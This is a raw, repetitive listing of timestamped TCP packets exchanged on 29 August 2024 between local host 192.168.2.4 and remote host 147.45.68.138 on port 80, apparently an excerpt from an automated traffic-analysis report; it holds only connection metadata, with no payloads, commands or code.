                                                      Aug 29, 2024 22:52:29.778932095 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.779694080 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779704094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779714108 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779723883 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779747009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779757023 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779759884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.779767990 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779786110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.779792070 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779793024 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.779808998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779819965 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.779819965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779833078 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779834986 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.779859066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.779872894 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.779901981 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779911995 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779922009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779931068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779942989 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.779942989 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779952049 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.779958010 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779970884 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.779974937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779978037 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.779989004 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.779997110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780003071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780010939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780025005 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780039072 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780044079 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780056953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780067921 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780077934 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780078888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780086994 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780108929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780237913 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780249119 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780258894 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780267954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780277967 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780282021 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780289888 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780301094 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780301094 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780313015 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780323982 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780324936 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780348063 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780350924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780358076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780369997 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780380964 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780385017 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780391932 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780405045 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780405998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780415058 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780421019 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780432940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780432940 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780443907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780445099 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780456066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780457020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780473948 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780503988 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780519009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780529976 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780539036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780550957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780560970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780560970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780572891 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780584097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780589104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780595064 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780596972 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780607939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780618906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780620098 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780639887 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780656099 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780657053 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780667067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780678988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780689001 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780690908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780699968 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780700922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780713081 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780720949 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780728102 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780749083 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780750990 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780761003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780771017 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780781984 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780783892 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780791998 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780795097 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780807018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780810118 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780818939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780818939 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780829906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780836105 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780838013 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780878067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780889034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780890942 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780900955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780911922 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780915976 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780922890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.780930996 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.780957937 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781074047 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781107903 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781112909 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781120062 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781146049 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781158924 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781227112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781238079 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781249046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781260014 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781265974 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781270027 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781292915 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781301022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781326056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781347036 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781358957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781368017 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781375885 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781397104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781450987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781466007 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781476974 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781486988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781491995 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781502008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781513929 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781528950 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781538010 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781543970 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781565905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781565905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781575918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781584024 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781590939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781593084 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781605005 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781621933 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781765938 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781776905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781785965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.781807899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781829119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.781972885 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.782016039 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.782068968 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.782083988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.782094955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.782104969 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.782109022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.782116890 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.782118082 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.782130003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.782140970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.782141924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.782164097 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.782174110 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865075111 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865088940 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865094900 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865305901 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865339041 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865350008 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865360022 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865372896 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865385056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865395069 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865400076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865407944 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865416050 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865420103 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865430117 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865433931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865452051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865453005 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865466118 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865472078 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865477085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865498066 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865520954 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865693092 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865741014 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865745068 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865786076 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865803957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865840912 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865874052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865885973 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865922928 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.865963936 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865976095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.865984917 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866012096 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866020918 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866028070 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866039991 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866056919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866064072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866067886 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866074085 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866081953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866094112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866099119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866099119 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866106987 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866120100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866126060 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866132975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866136074 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866144896 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866164923 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866184950 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866189957 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866205931 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866224051 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866235018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866235018 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866245985 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866250992 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866260052 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866266966 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866287947 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866287947 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866302013 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866312027 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866313934 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866328955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866333961 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866341114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866343975 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866353035 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866370916 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866394997 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866432905 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866450071 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866460085 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866468906 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866480112 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866481066 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866488934 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866496086 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866506100 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866517067 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866519928 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866528034 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866535902 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866539955 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.866564035 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866585970 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.866980076 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867029905 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867038965 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867048979 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867079020 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867086887 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867098093 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867106915 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867135048 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867151022 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867172003 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867183924 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867193937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867213964 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867239952 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867274046 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867290020 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867301941 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867311954 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867312908 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867324114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867331982 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867352009 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867353916 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867368937 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867376089 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867387056 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867403030 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867413998 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867414951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867414951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867414951 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867425919 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867433071 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867439032 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867446899 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867450953 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867469072 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867480040 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867511988 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867523909 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867535114 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867543936 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867556095 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867564917 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867573977 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867587090 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867593050 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867605925 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867621899 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867623091 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867633104 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867640018 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867650986 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867651939 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867662907 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867674112 CEST8049739147.45.68.138192.168.2.4
                                                      Aug 29, 2024 22:52:29.867685080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867685080 CEST4973980192.168.2.4147.45.68.138
                                                      Aug 29, 2024 22:52:29.867693901 CEST8049739147.45.68.138192.168.2.4
